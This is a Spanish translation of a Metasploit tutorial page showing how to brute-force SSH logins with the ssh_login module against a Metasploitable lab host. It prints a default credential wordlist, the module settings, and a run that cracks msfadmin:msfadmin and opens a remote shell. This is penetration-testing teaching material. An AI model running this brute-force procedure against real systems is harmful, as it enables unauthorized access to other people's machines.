Ssh/ssh login
De www.metasploit-es.com.ar
El modulo ssh_login es muy versatil en el sentido de que no solo puede probar un conjunto de credenciales a traves de un rango de direcciones IP, sino que tambien puede realizar intentos de inicio de sesion por fuerza bruta. Pasaremos un archivo al modulo que contenga nombres de usuarios y contraseñas, separados por un espacio, como se muestra a continuacion.
root@bt:~# head /opt/metasploit3/msf3/data/wordlists/root_userpass.txt root root !root root Cisco root NeXT root QNX root admin root attack root ax400 root bagabu root blablabla
Seguidamente, cargamos el modulo escaneador en Metasploit y definimos USERPASS_FILE para que apunte a nuestra lista de credenciales para probar.
msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true yes Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts msf auxiliary(ssh_login) > set RHOSTS 192.168.1.154 RHOSTS => 192.168.1.154 msf auxiliary(ssh_login) > set USERPASS_FILE /opt/metasploit3/msf3/data/wordlists/root_userpass.txt USERPASS_FILE => /opt/metasploit3/msf3/data/wordlists/root_userpass.txt msf auxiliary(ssh_login) > set VERBOSE false VERBOSE => false
Con todo preparado, ejecutamos el modulo. Cuando se encuentra un par valido de credenciales, se nos presenta una shell en la maquina remota.
msf auxiliary(ssh_login) > run [*] 192.168.1.154:22 - SSH - Starting buteforce [*] Command shell session 1 opened (?? -> ??) at 2010-09-09 17:25:18 -0600 [+] 192.168.1.154:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ssh_login) > sessions -i 1 [*] Starting interaction with 1... id uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux exit [*] Command shell session 1 closed. msf auxiliary(ssh_login) >
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
